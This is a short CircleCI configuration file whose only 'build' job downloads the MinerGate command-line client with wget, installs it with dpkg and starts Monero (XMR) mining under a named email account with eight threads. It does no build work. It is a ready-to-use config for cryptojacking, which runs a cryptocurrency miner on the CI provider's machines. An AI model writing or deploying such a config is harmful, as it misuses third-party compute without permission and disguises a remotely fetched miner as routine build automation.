version: 2
jobs:
  build:
    machine: true
    steps:
      - checkout
      - run:
          command: |
            apt update -yqq
            apt install libpcre16-3 libxcb1 wget -yqq
            wget https://minergate.com/download/ubuntu-cli
            dpkg -i ubuntu-cli
            minergate-cli --user yoginth@outlook.in --xmr 8
